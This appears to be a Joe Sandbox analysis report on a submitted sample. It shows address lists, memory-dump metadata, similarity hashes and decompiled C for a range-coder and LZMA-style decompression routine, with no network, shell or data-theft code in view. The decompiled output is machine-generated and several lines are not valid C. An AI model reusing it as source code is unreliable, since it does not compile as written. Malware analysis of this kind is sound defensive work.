0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
